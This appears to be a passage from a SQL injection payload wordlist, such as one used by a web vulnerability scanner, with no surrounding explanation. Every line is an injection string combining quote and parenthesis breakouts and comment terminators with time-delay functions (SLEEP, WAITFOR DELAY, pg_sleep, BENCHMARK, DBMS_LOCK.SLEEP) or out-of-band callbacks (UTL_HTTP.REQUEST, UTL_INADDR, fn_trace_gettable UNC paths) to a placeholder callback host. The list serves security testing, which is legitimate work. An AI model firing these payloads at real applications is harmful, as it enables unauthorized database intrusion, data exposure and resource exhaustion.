"+WAITFOR DELAY '00:00:11'))  -- 
"+WAITFOR DELAY '00:00:11')) /* 
"+WAITFOR DELAY '00:00:11')))  -- 
"+WAITFOR DELAY '00:00:11'))) /* 
"+(select * from fn_trace_gettable('\\{BC}\1.trc',default))  -- 
"+(select * from fn_trace_gettable('\\{BC}\1.trc',default)) /* 
"+(select * from fn_trace_gettable('\\{BC}\1.trc',default)))  -- 
"+(select * from fn_trace_gettable('\\{BC}\1.trc',default))) /* 
"+(select * from fn_trace_gettable('\\{BC}\1.trc',default))))  -- 
"+(select * from fn_trace_gettable('\\{BC}\1.trc',default)))) /* 
"+(select * from fn_trace_gettable('\\{BC}\1.trc',default)))))  -- 
"+(select * from fn_trace_gettable('\\{BC}\1.trc',default))))) /* 
"+pg_sleep(11) is not null  -- 
"+pg_sleep(11) is not null /* 
"+pg_sleep(11) is not null)  -- 
"+pg_sleep(11) is not null) /* 
"+pg_sleep(11) is not null))  -- 
"+pg_sleep(11) is not null)) /* 
"+pg_sleep(11) is not null)))  -- 
"+pg_sleep(11) is not null))) /* 
"+HEX(RANDOMBLOB(10000000000/2))  -- 
"+HEX(RANDOMBLOB(10000000000/2)) /* 
"+HEX(RANDOMBLOB(10000000000/2)))  -- 
"+HEX(RANDOMBLOB(10000000000/2))) /* 
"+HEX(RANDOMBLOB(10000000000/2))))  -- 
"+HEX(RANDOMBLOB(10000000000/2)))) /* 
"+HEX(RANDOMBLOB(10000000000/2)))))  -- 
"+HEX(RANDOMBLOB(10000000000/2))))) /* 
"+UTL_INADDR.get_host_name('10.0.0.1')  -- 
"+UTL_INADDR.get_host_name('10.0.0.1') /* 
"+UTL_INADDR.get_host_name('10.0.0.1'))  -- 
"+UTL_INADDR.get_host_name('10.0.0.1')) /* 
"+UTL_INADDR.get_host_name('10.0.0.1')))  -- 
"+UTL_INADDR.get_host_name('10.0.0.1'))) /* 
"+UTL_INADDR.get_host_name('10.0.0.1'))))  -- 
"+UTL_INADDR.get_host_name('10.0.0.1')))) /* 
"+UTL_INADDR.get_host_address('{BC}')  -- 
"+UTL_INADDR.get_host_address('{BC}') /* 
"+UTL_INADDR.get_host_address('{BC}'))  -- 
"+UTL_INADDR.get_host_address('{BC}')) /* 
"+UTL_INADDR.get_host_address('{BC}')))  -- 
"+UTL_INADDR.get_host_address('{BC}'))) /* 
"+UTL_INADDR.get_host_address('{BC}'))))  -- 
"+UTL_INADDR.get_host_address('{BC}')))) /* 
"+UTL_HTTP.REQUEST('http://{BC}')  -- 
"+UTL_HTTP.REQUEST('http://{BC}') /* 
"+UTL_HTTP.REQUEST('http://{BC}'))  -- 
"+UTL_HTTP.REQUEST('http://{BC}')) /* 
"+UTL_HTTP.REQUEST('http://{BC}')))  -- 
"+UTL_HTTP.REQUEST('http://{BC}'))) /* 
"+UTL_HTTP.REQUEST('http://{BC}'))))  -- 
"+UTL_HTTP.REQUEST('http://{BC}')))) /* 
"||BENCHMARK(100000000,MD5('A'))  -- 
"||BENCHMARK(100000000,MD5('A')) /* 
"||BENCHMARK(100000000,MD5('A')))  -- 
"||BENCHMARK(100000000,MD5('A'))) /* 
"||BENCHMARK(100000000,MD5('A'))))  -- 
"||BENCHMARK(100000000,MD5('A')))) /* 
"||BENCHMARK(100000000,MD5('A')))))  -- 
"||BENCHMARK(100000000,MD5('A'))))) /* 
"||SLEEP(11)  -- 
"||SLEEP(11) /* 
"||SLEEP(11))  -- 
"||SLEEP(11)) /* 
"||SLEEP(11)))  -- 
"||SLEEP(11))) /* 
"||SLEEP(11))))  -- 
"||SLEEP(11)))) /* 
"||WAITFOR DELAY '00:00:11'  -- 
"||WAITFOR DELAY '00:00:11' /* 
"||WAITFOR DELAY '00:00:11')  -- 
"||WAITFOR DELAY '00:00:11') /* 
"||WAITFOR DELAY '00:00:11'))  -- 
"||WAITFOR DELAY '00:00:11')) /* 
"||WAITFOR DELAY '00:00:11')))  -- 
"||WAITFOR DELAY '00:00:11'))) /* 
"||(select * from fn_trace_gettable('\\{BC}\1.trc',default))  -- 
"||(select * from fn_trace_gettable('\\{BC}\1.trc',default)) /* 
"||(select * from fn_trace_gettable('\\{BC}\1.trc',default)))  -- 
"||(select * from fn_trace_gettable('\\{BC}\1.trc',default))) /* 
"||(select * from fn_trace_gettable('\\{BC}\1.trc',default))))  -- 
"||(select * from fn_trace_gettable('\\{BC}\1.trc',default)))) /* 
"||(select * from fn_trace_gettable('\\{BC}\1.trc',default)))))  -- 
"||(select * from fn_trace_gettable('\\{BC}\1.trc',default))))) /* 
"||pg_sleep(11) is not null  -- 
"||pg_sleep(11) is not null /* 
"||pg_sleep(11) is not null)  -- 
"||pg_sleep(11) is not null) /* 
"||pg_sleep(11) is not null))  -- 
"||pg_sleep(11) is not null)) /* 
"||pg_sleep(11) is not null)))  -- 
"||pg_sleep(11) is not null))) /* 
"||HEX(RANDOMBLOB(10000000000/2))  -- 
"||HEX(RANDOMBLOB(10000000000/2)) /* 
"||HEX(RANDOMBLOB(10000000000/2)))  -- 
"||HEX(RANDOMBLOB(10000000000/2))) /* 
"||HEX(RANDOMBLOB(10000000000/2))))  -- 
"||HEX(RANDOMBLOB(10000000000/2)))) /* 
"||HEX(RANDOMBLOB(10000000000/2)))))  -- 
"||HEX(RANDOMBLOB(10000000000/2))))) /* 
"||UTL_INADDR.get_host_name('10.0.0.1')  -- 
"||UTL_INADDR.get_host_name('10.0.0.1') /* 
"||UTL_INADDR.get_host_name('10.0.0.1'))  -- 
"||UTL_INADDR.get_host_name('10.0.0.1')) /* 
"||UTL_INADDR.get_host_name('10.0.0.1')))  -- 
"||UTL_INADDR.get_host_name('10.0.0.1'))) /* 
"||UTL_INADDR.get_host_name('10.0.0.1'))))  -- 
"||UTL_INADDR.get_host_name('10.0.0.1')))) /* 
"||UTL_INADDR.get_host_address('{BC}')  -- 
"||UTL_INADDR.get_host_address('{BC}') /* 
"||UTL_INADDR.get_host_address('{BC}'))  -- 
"||UTL_INADDR.get_host_address('{BC}')) /* 
"||UTL_INADDR.get_host_address('{BC}')))  -- 
"||UTL_INADDR.get_host_address('{BC}'))) /* 
"||UTL_INADDR.get_host_address('{BC}'))))  -- 
"||UTL_INADDR.get_host_address('{BC}')))) /* 
"||UTL_HTTP.REQUEST('http://{BC}')  -- 
"||UTL_HTTP.REQUEST('http://{BC}') /* 
"||UTL_HTTP.REQUEST('http://{BC}'))  -- 
"||UTL_HTTP.REQUEST('http://{BC}')) /* 
"||UTL_HTTP.REQUEST('http://{BC}')))  -- 
"||UTL_HTTP.REQUEST('http://{BC}'))) /* 
"||UTL_HTTP.REQUEST('http://{BC}'))))  -- 
"||UTL_HTTP.REQUEST('http://{BC}')))) /* 
" and BENCHMARK(100000000,MD5('A'))  -- 
" and BENCHMARK(100000000,MD5('A')) /* 
" and BENCHMARK(100000000,MD5('A')))  -- 
" and BENCHMARK(100000000,MD5('A'))) /* 
" and BENCHMARK(100000000,MD5('A'))))  -- 
" and BENCHMARK(100000000,MD5('A')))) /* 
" and BENCHMARK(100000000,MD5('A')))))  -- 
" and BENCHMARK(100000000,MD5('A'))))) /* 
" and SLEEP(11)  -- 
" and SLEEP(11) /* 
" and SLEEP(11))  -- 
" and SLEEP(11)) /* 
" and SLEEP(11)))  -- 
" and SLEEP(11))) /* 
" and SLEEP(11))))  -- 
" and SLEEP(11)))) /* 
" and WAITFOR DELAY '00:00:11'  -- 
" and WAITFOR DELAY '00:00:11' /* 
" and WAITFOR DELAY '00:00:11')  -- 
" and WAITFOR DELAY '00:00:11') /* 
" and WAITFOR DELAY '00:00:11'))  -- 
" and WAITFOR DELAY '00:00:11')) /* 
" and WAITFOR DELAY '00:00:11')))  -- 
" and WAITFOR DELAY '00:00:11'))) /* 
" and (select * from fn_trace_gettable('\\{BC}\1.trc',default))  -- 
" and (select * from fn_trace_gettable('\\{BC}\1.trc',default)) /* 
" and (select * from fn_trace_gettable('\\{BC}\1.trc',default)))  -- 
" and (select * from fn_trace_gettable('\\{BC}\1.trc',default))) /* 
" and (select * from fn_trace_gettable('\\{BC}\1.trc',default))))  -- 
" and (select * from fn_trace_gettable('\\{BC}\1.trc',default)))) /* 
" and (select * from fn_trace_gettable('\\{BC}\1.trc',default)))))  -- 
" and (select * from fn_trace_gettable('\\{BC}\1.trc',default))))) /* 
" and pg_sleep(11) is not null  -- 
" and pg_sleep(11) is not null /* 
" and pg_sleep(11) is not null)  -- 
" and pg_sleep(11) is not null) /* 
" and pg_sleep(11) is not null))  -- 
" and pg_sleep(11) is not null)) /* 
" and pg_sleep(11) is not null)))  -- 
" and pg_sleep(11) is not null))) /* 
" and HEX(RANDOMBLOB(10000000000/2))  -- 
" and HEX(RANDOMBLOB(10000000000/2)) /* 
" and HEX(RANDOMBLOB(10000000000/2)))  -- 
" and HEX(RANDOMBLOB(10000000000/2))) /* 
" and HEX(RANDOMBLOB(10000000000/2))))  -- 
" and HEX(RANDOMBLOB(10000000000/2)))) /* 
" and HEX(RANDOMBLOB(10000000000/2)))))  -- 
" and HEX(RANDOMBLOB(10000000000/2))))) /* 
" and UTL_INADDR.get_host_name('10.0.0.1')  -- 
" and UTL_INADDR.get_host_name('10.0.0.1') /* 
" and UTL_INADDR.get_host_name('10.0.0.1'))  -- 
" and UTL_INADDR.get_host_name('10.0.0.1')) /* 
" and UTL_INADDR.get_host_name('10.0.0.1')))  -- 
" and UTL_INADDR.get_host_name('10.0.0.1'))) /* 
" and UTL_INADDR.get_host_name('10.0.0.1'))))  -- 
" and UTL_INADDR.get_host_name('10.0.0.1')))) /* 
" and UTL_INADDR.get_host_address('{BC}')  -- 
" and UTL_INADDR.get_host_address('{BC}') /* 
" and UTL_INADDR.get_host_address('{BC}'))  -- 
" and UTL_INADDR.get_host_address('{BC}')) /* 
" and UTL_INADDR.get_host_address('{BC}')))  -- 
" and UTL_INADDR.get_host_address('{BC}'))) /* 
" and UTL_INADDR.get_host_address('{BC}'))))  -- 
" and UTL_INADDR.get_host_address('{BC}')))) /* 
" and UTL_HTTP.REQUEST('http://{BC}')  -- 
" and UTL_HTTP.REQUEST('http://{BC}') /* 
" and UTL_HTTP.REQUEST('http://{BC}'))  -- 
" and UTL_HTTP.REQUEST('http://{BC}')) /* 
" and UTL_HTTP.REQUEST('http://{BC}')))  -- 
" and UTL_HTTP.REQUEST('http://{BC}'))) /* 
" and UTL_HTTP.REQUEST('http://{BC}'))))  -- 
" and UTL_HTTP.REQUEST('http://{BC}')))) /* 
' and BENCHMARK(100000000,MD5('A')) and '1'='a
' and SLEEP(11) and '1'='a
' and WAITFOR DELAY '00:00:11' and '1'='a
' and (select * from fn_trace_gettable('\\{BC}\1.trc',default)) and '1'='a
' and pg_sleep(11) is not null and '1'='a
' and HEX(RANDOMBLOB(10000000000/2)) and '1'='a
' and UTL_INADDR.get_host_name('10.0.0.1') and '1'='a
' and UTL_INADDR.get_host_address('{BC}') and '1'='a
' and UTL_HTTP.REQUEST('http://{BC}') and '1'='a
" and BENCHMARK(100000000,MD5('A')) and "1"="a
" and SLEEP(11) and "1"="a
" and WAITFOR DELAY '00:00:11' and "1"="a
" and (select * from fn_trace_gettable('\\{BC}\1.trc',default)) and "1"="a
" and pg_sleep(11) is not null and "1"="a
" and HEX(RANDOMBLOB(10000000000/2)) and "1"="a
" and UTL_INADDR.get_host_name('10.0.0.1') and "1"="a
" and UTL_INADDR.get_host_address('{BC}') and "1"="a
" and UTL_HTTP.REQUEST('http://{BC}') and "1"="a
') and BENCHMARK(100000000,MD5('A')) and ('1'='a
') and SLEEP(11) and ('1'='a
') and WAITFOR DELAY '00:00:11' and ('1'='a
') and (select * from fn_trace_gettable('\\{BC}\1.trc',default)) and ('1'='a
') and pg_sleep(11) is not null and ('1'='a
') and HEX(RANDOMBLOB(10000000000/2)) and ('1'='a
') and UTL_INADDR.get_host_name('10.0.0.1') and ('1'='a
') and UTL_INADDR.get_host_address('{BC}') and ('1'='a
') and UTL_HTTP.REQUEST('http://{BC}') and ('1'='a
") and BENCHMARK(100000000,MD5('A')) and ("1"="a
") and SLEEP(11) and ("1"="a
") and WAITFOR DELAY '00:00:11' and ("1"="a
") and (select * from fn_trace_gettable('\\{BC}\1.trc',default)) and ("1"="a
") and pg_sleep(11) is not null and ("1"="a
") and HEX(RANDOMBLOB(10000000000/2)) and ("1"="a
") and UTL_INADDR.get_host_name('10.0.0.1') and ("1"="a
") and UTL_INADDR.get_host_address('{BC}') and ("1"="a
") and UTL_HTTP.REQUEST('http://{BC}') and ("1"="a
(BENCHMARK(100000000,MD5('A')))
(SLEEP(11))
(WAITFOR DELAY '00:00:11')
((select * from fn_trace_gettable('\\{BC}\1.trc',default)))
(pg_sleep(11) is not null)
(HEX(RANDOMBLOB(10000000000/2)))
(UTL_INADDR.get_host_name('10.0.0.1'))
(UTL_INADDR.get_host_address('{BC}'))
(UTL_HTTP.REQUEST('http://{BC}'))
(BENCHMARK(100000000,MD5('A')))  -- 
(BENCHMARK(100000000,MD5('A'))) /* 
(BENCHMARK(100000000,MD5('A'))))  -- 
(BENCHMARK(100000000,MD5('A')))) /* 
(BENCHMARK(100000000,MD5('A')))))  -- 
(BENCHMARK(100000000,MD5('A'))))) /* 
(BENCHMARK(100000000,MD5('A'))))))  -- 
(BENCHMARK(100000000,MD5('A')))))) /* 
(SLEEP(11))  -- 
(SLEEP(11)) /* 
(SLEEP(11)))  -- 
(SLEEP(11))) /* 
(SLEEP(11))))  -- 
(SLEEP(11)))) /* 
(SLEEP(11)))))  -- 
(SLEEP(11))))) /* 
(WAITFOR DELAY '00:00:11')  -- 
(WAITFOR DELAY '00:00:11') /* 
(WAITFOR DELAY '00:00:11'))  -- 
(WAITFOR DELAY '00:00:11')) /* 
(WAITFOR DELAY '00:00:11')))  -- 
(WAITFOR DELAY '00:00:11'))) /* 
(WAITFOR DELAY '00:00:11'))))  -- 
(WAITFOR DELAY '00:00:11')))) /* 
((select * from fn_trace_gettable('\\{BC}\1.trc',default)))  -- 
((select * from fn_trace_gettable('\\{BC}\1.trc',default))) /* 
((select * from fn_trace_gettable('\\{BC}\1.trc',default))))  -- 
((select * from fn_trace_gettable('\\{BC}\1.trc',default)))) /* 
((select * from fn_trace_gettable('\\{BC}\1.trc',default)))))  -- 
((select * from fn_trace_gettable('\\{BC}\1.trc',default))))) /* 
((select * from fn_trace_gettable('\\{BC}\1.trc',default))))))  -- 
((select * from fn_trace_gettable('\\{BC}\1.trc',default)))))) /* 
(pg_sleep(11) is not null)  -- 
(pg_sleep(11) is not null) /* 
(pg_sleep(11) is not null))  -- 
(pg_sleep(11) is not null)) /* 
(pg_sleep(11) is not null)))  -- 
(pg_sleep(11) is not null))) /* 
(pg_sleep(11) is not null))))  -- 
(pg_sleep(11) is not null)))) /* 
(HEX(RANDOMBLOB(10000000000/2)))  -- 
(HEX(RANDOMBLOB(10000000000/2))) /* 
(HEX(RANDOMBLOB(10000000000/2))))  -- 
(HEX(RANDOMBLOB(10000000000/2)))) /* 
(HEX(RANDOMBLOB(10000000000/2)))))  -- 
(HEX(RANDOMBLOB(10000000000/2))))) /* 
(HEX(RANDOMBLOB(10000000000/2))))))  -- 
(HEX(RANDOMBLOB(10000000000/2)))))) /* 
(UTL_INADDR.get_host_name('10.0.0.1'))  -- 
(UTL_INADDR.get_host_name('10.0.0.1')) /* 
(UTL_INADDR.get_host_name('10.0.0.1')))  -- 
(UTL_INADDR.get_host_name('10.0.0.1'))) /* 
(UTL_INADDR.get_host_name('10.0.0.1'))))  -- 
(UTL_INADDR.get_host_name('10.0.0.1')))) /* 
(UTL_INADDR.get_host_name('10.0.0.1')))))  -- 
(UTL_INADDR.get_host_name('10.0.0.1'))))) /* 
(UTL_INADDR.get_host_address('{BC}'))  -- 
(UTL_INADDR.get_host_address('{BC}')) /* 
(UTL_INADDR.get_host_address('{BC}')))  -- 
(UTL_INADDR.get_host_address('{BC}'))) /* 
(UTL_INADDR.get_host_address('{BC}'))))  -- 
(UTL_INADDR.get_host_address('{BC}')))) /* 
(UTL_INADDR.get_host_address('{BC}')))))  -- 
(UTL_INADDR.get_host_address('{BC}'))))) /* 
(UTL_HTTP.REQUEST('http://{BC}'))  -- 
(UTL_HTTP.REQUEST('http://{BC}')) /* 
(UTL_HTTP.REQUEST('http://{BC}')))  -- 
(UTL_HTTP.REQUEST('http://{BC}'))) /* 
(UTL_HTTP.REQUEST('http://{BC}'))))  -- 
(UTL_HTTP.REQUEST('http://{BC}')))) /* 
(UTL_HTTP.REQUEST('http://{BC}')))))  -- 
(UTL_HTTP.REQUEST('http://{BC}'))))) /* 
; BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
; BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
; WAITFOR DELAY '00:00:10';  -- 
; WAITFOR DELAY '00:00:10'; /* 
; select * from fn_trace_gettable('\\{BC}\1.trc',default);  -- 
; select * from fn_trace_gettable('\\{BC}\1.trc',default); /* 
; select BENCHMARK(100000000,MD5('A'));  -- 
; select BENCHMARK(100000000,MD5('A')); /* 
; select SLEEP(11);  -- 
; select SLEEP(11); /* 
; select WAITFOR DELAY '00:00:11';  -- 
; select WAITFOR DELAY '00:00:11'; /* 
; select (select * from fn_trace_gettable('\\{BC}\1.trc',default));  -- 
; select (select * from fn_trace_gettable('\\{BC}\1.trc',default)); /* 
; select pg_sleep(11) is not null;  -- 
; select pg_sleep(11) is not null; /* 
; select HEX(RANDOMBLOB(10000000000/2));  -- 
; select HEX(RANDOMBLOB(10000000000/2)); /* 
); BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
); BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
); WAITFOR DELAY '00:00:10';  -- 
); WAITFOR DELAY '00:00:10'; /* 
); select * from fn_trace_gettable('\\{BC}\1.trc',default);  -- 
); select * from fn_trace_gettable('\\{BC}\1.trc',default); /* 
); select BENCHMARK(100000000,MD5('A'));  -- 
); select BENCHMARK(100000000,MD5('A')); /* 
); select SLEEP(11);  -- 
); select SLEEP(11); /* 
); select WAITFOR DELAY '00:00:11';  -- 
); select WAITFOR DELAY '00:00:11'; /* 
); select (select * from fn_trace_gettable('\\{BC}\1.trc',default));  -- 
); select (select * from fn_trace_gettable('\\{BC}\1.trc',default)); /* 
); select pg_sleep(11) is not null;  -- 
); select pg_sleep(11) is not null; /* 
); select HEX(RANDOMBLOB(10000000000/2));  -- 
); select HEX(RANDOMBLOB(10000000000/2)); /* 
)); BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
)); BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
)); WAITFOR DELAY '00:00:10';  -- 
)); WAITFOR DELAY '00:00:10'; /* 
)); select * from fn_trace_gettable('\\{BC}\1.trc',default);  -- 
)); select * from fn_trace_gettable('\\{BC}\1.trc',default); /* 
)); select BENCHMARK(100000000,MD5('A'));  -- 
)); select BENCHMARK(100000000,MD5('A')); /* 
)); select SLEEP(11);  -- 
)); select SLEEP(11); /* 
)); select WAITFOR DELAY '00:00:11';  -- 
)); select WAITFOR DELAY '00:00:11'; /* 
)); select (select * from fn_trace_gettable('\\{BC}\1.trc',default));  -- 
)); select (select * from fn_trace_gettable('\\{BC}\1.trc',default)); /* 
)); select pg_sleep(11) is not null;  -- 
)); select pg_sleep(11) is not null; /* 
)); select HEX(RANDOMBLOB(10000000000/2));  -- 
)); select HEX(RANDOMBLOB(10000000000/2)); /* 
))); BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
))); BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
))); WAITFOR DELAY '00:00:10';  -- 
))); WAITFOR DELAY '00:00:10'; /* 
))); select * from fn_trace_gettable('\\{BC}\1.trc',default);  -- 
))); select * from fn_trace_gettable('\\{BC}\1.trc',default); /* 
))); select BENCHMARK(100000000,MD5('A'));  -- 
))); select BENCHMARK(100000000,MD5('A')); /* 
))); select SLEEP(11);  -- 
))); select SLEEP(11); /* 
))); select WAITFOR DELAY '00:00:11';  -- 
))); select WAITFOR DELAY '00:00:11'; /* 
))); select (select * from fn_trace_gettable('\\{BC}\1.trc',default));  -- 
))); select (select * from fn_trace_gettable('\\{BC}\1.trc',default)); /* 
))); select pg_sleep(11) is not null;  -- 
))); select pg_sleep(11) is not null; /* 
))); select HEX(RANDOMBLOB(10000000000/2));  -- 
))); select HEX(RANDOMBLOB(10000000000/2)); /* 
'; BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
'; BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
'; WAITFOR DELAY '00:00:10';  -- 
'; WAITFOR DELAY '00:00:10'; /* 
'; select * from fn_trace_gettable('\\{BC}\1.trc',default);  -- 
'; select * from fn_trace_gettable('\\{BC}\1.trc',default); /* 
'; select BENCHMARK(100000000,MD5('A'));  -- 
'; select BENCHMARK(100000000,MD5('A')); /* 
'; select SLEEP(11);  -- 
'; select SLEEP(11); /* 
'; select WAITFOR DELAY '00:00:11';  -- 
'; select WAITFOR DELAY '00:00:11'; /* 
'; select (select * from fn_trace_gettable('\\{BC}\1.trc',default));  -- 
'; select (select * from fn_trace_gettable('\\{BC}\1.trc',default)); /* 
'; select pg_sleep(11) is not null;  -- 
'; select pg_sleep(11) is not null; /* 
'; select HEX(RANDOMBLOB(10000000000/2));  -- 
'; select HEX(RANDOMBLOB(10000000000/2)); /* 
'); BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
'); BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
'); WAITFOR DELAY '00:00:10';  -- 
'); WAITFOR DELAY '00:00:10'; /* 
'); select * from fn_trace_gettable('\\{BC}\1.trc',default);  -- 
'); select * from fn_trace_gettable('\\{BC}\1.trc',default); /* 
'); select BENCHMARK(100000000,MD5('A'));  -- 
'); select BENCHMARK(100000000,MD5('A')); /* 
'); select SLEEP(11);  -- 
'); select SLEEP(11); /* 
'); select WAITFOR DELAY '00:00:11';  -- 
'); select WAITFOR DELAY '00:00:11'; /* 
'); select (select * from fn_trace_gettable('\\{BC}\1.trc',default));  -- 
'); select (select * from fn_trace_gettable('\\{BC}\1.trc',default)); /* 
'); select pg_sleep(11) is not null;  -- 
'); select pg_sleep(11) is not null; /* 
'); select HEX(RANDOMBLOB(10000000000/2));  -- 
'); select HEX(RANDOMBLOB(10000000000/2)); /* 
')); BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
')); BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
')); WAITFOR DELAY '00:00:10';  -- 
')); WAITFOR DELAY '00:00:10'; /* 
')); select * from fn_trace_gettable('\\{BC}\1.trc',default);  -- 
')); select * from fn_trace_gettable('\\{BC}\1.trc',default); /* 
')); select BENCHMARK(100000000,MD5('A'));  -- 
')); select BENCHMARK(100000000,MD5('A')); /* 
')); select SLEEP(11);  -- 
')); select SLEEP(11); /* 
')); select WAITFOR DELAY '00:00:11';  -- 
')); select WAITFOR DELAY '00:00:11'; /* 
')); select (select * from fn_trace_gettable('\\{BC}\1.trc',default));  -- 
')); select (select * from fn_trace_gettable('\\{BC}\1.trc',default)); /* 
')); select pg_sleep(11) is not null;  -- 
')); select pg_sleep(11) is not null; /* 
')); select HEX(RANDOMBLOB(10000000000/2));  -- 
')); select HEX(RANDOMBLOB(10000000000/2)); /* 
'))); BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
'))); BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
'))); WAITFOR DELAY '00:00:10';  -- 
'))); WAITFOR DELAY '00:00:10'; /* 
'))); select * from fn_trace_gettable('\\{BC}\1.trc',default);  -- 
'))); select * from fn_trace_gettable('\\{BC}\1.trc',default); /* 
'))); select BENCHMARK(100000000,MD5('A'));  -- 
'))); select BENCHMARK(100000000,MD5('A')); /* 
'))); select SLEEP(11);  -- 
'))); select SLEEP(11); /* 
'))); select WAITFOR DELAY '00:00:11';  -- 
'))); select WAITFOR DELAY '00:00:11'; /* 
'))); select (select * from fn_trace_gettable('\\{BC}\1.trc',default));  -- 
'))); select (select * from fn_trace_gettable('\\{BC}\1.trc',default)); /* 
'))); select pg_sleep(11) is not null;  -- 
'))); select pg_sleep(11) is not null; /* 
'))); select HEX(RANDOMBLOB(10000000000/2));  -- 
'))); select HEX(RANDOMBLOB(10000000000/2)); /* 